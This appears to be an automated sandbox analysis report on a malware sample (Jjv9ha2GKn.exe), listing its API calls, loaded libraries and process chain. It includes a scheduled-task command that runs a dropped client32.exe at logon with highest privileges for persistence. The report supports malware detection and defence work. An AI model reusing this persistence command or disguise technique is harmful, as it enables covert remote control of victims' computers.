                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_11112960 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA

                                System Summary

                                Source: Jjv9ha2GKn.exe, n2P6H.cs | Large array initialization: Cd02: array initializer size 3356
                                Source: Jjv9ha2GKn.exe, Qm7j5.cs | Large array initialization: Qm7j5: array initializer size 3868
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_110A9020: DeviceIoControl
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe | Code function: 0_2_075DACA0 CreateProcessAsUserW
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110292009_2_11029200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1106F2009_2_1106F200
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1107F5909_2_1107F590
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1115F9009_2_1115F900
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1101B9509_2_1101B950
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11163B659_2_11163B65
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1101BD909_2_1101BD90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110503E09_2_110503E0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110724D09_2_110724D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_110329A09_2_110329A0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_111228609_2_11122860
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1100887B9_2_1100887B
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11044B909_2_11044B90
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1101CBB09_2_1101CBB0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_11086D609_2_11086D60
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD430A0 appears 54 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CE00950 appears 68 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 110B6AB0 appears 41 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD57A90 appears 62 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1116B6F0 appears 74 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 110274F0 appears 94 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1116FD13 appears 40 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1109C970 appears 32 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1105D480 appears 54 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 110290C0 appears 2088 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD46F50 appears 171 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 11142790 appears 1186 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD57D00 appears 135 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 111606A0 appears 64 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD6F3CB appears 33 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 11080CC0 appears 85 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD57C70 appears 36 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 6CD69480 appears 61 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1115CAC3 appears 95 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 11143200 appears 46 times
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: String function: 1105D350 appears 564 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00407AE0 appears 33 times
                                Source: mscpx32r.dLL.4.drStatic PE information: No import functions for PE file found
                                Source: netmsg.dll.4.drStatic PE information: No import functions for PE file found
                                Source: neth.dll.4.drStatic PE information: No import functions for PE file found
                                Source: Jjv9ha2GKn.exe, 00000000.00000000.2041444310.0000000000862000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameTableTextCompare.exeB vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2761866053.0000000007570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2750654559.000000000089E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exe, 00000000.00000002.2759945326.00000000051E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTokenTableApp.dll> vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exeBinary or memory string: OriginalFilenameTableTextCompare.exeB vs Jjv9ha2GKn.exe
                                Source: Jjv9ha2GKn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@9/27@3/3
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11059290 GetLastError,FormatMessageA,LocalFree,7_2_11059290
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1109C580 AdjustTokenPrivileges,CloseHandle,7_2_1109C580
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,7_2_1109C4F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1109C580 AdjustTokenPrivileges,CloseHandle,9_2_1109C580
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 9_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,9_2_1109C4F0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11095A00 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,7_2_11095A00
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_110CC3D0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,7_2_110CC3D0
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeCode function: 7_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,7_2_11124DC0
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Jjv9ha2GKn.exe.logJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeMutant created: NULL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\bghe5h5enr5ejm45nt6tv453v43cv45hn45nm
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1536:120:WilError_03
                                Source: Jjv9ha2GKn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: Jjv9ha2GKn.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Jjv9ha2GKn.exeReversingLabs: Detection: 47%
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeFile read: C:\Users\user\Desktop\Jjv9ha2GKn.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\Jjv9ha2GKn.exe "C:\Users\user\Desktop\Jjv9ha2GKn.exe"
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exe
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exe
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHESTJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\AppData\Local\DNScache\client32.exe C:\Users\user\AppData\Local\DNScache\client32.exeJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: fwpolicyiomgr.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: dhcpcsvc6.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: dhcpcsvc.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: pcicl32.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: shfolder.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: pcichek.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: pcicapi.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: netapi32.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: msvcr100.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: samcli.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: nsmtrace.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: nslsp.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: devobj.dll
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe Section loaded: msasn1.dll
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File written: C:\Users\user\AppData\Local\DNScache\client32.ini
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
                                Source: Window Recorder Window detected: More than 3 window changes detected
                                Source: C:\Users\user\Desktop\Jjv9ha2GKn.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: Jjv9ha2GKn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                Source: Jjv9ha2GKn.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                                Source: Jjv9ha2GKn.exe Static file information: File size 1128960 > 1048576
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe File opened: C:\Users\user\AppData\Local\DNScache\MSVCR100.dll
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_CURSOR
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_BITMAP
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_ICON
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_MENU
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_DIALOG
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_STRING
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_ACCELERATOR
                                Source: Jjv9ha2GKn.exe Static PE information: section name: RT_GROUP_ICON
                                Source: Jjv9ha2GKn.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10fa00
                                Source: Jjv9ha2GKn.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
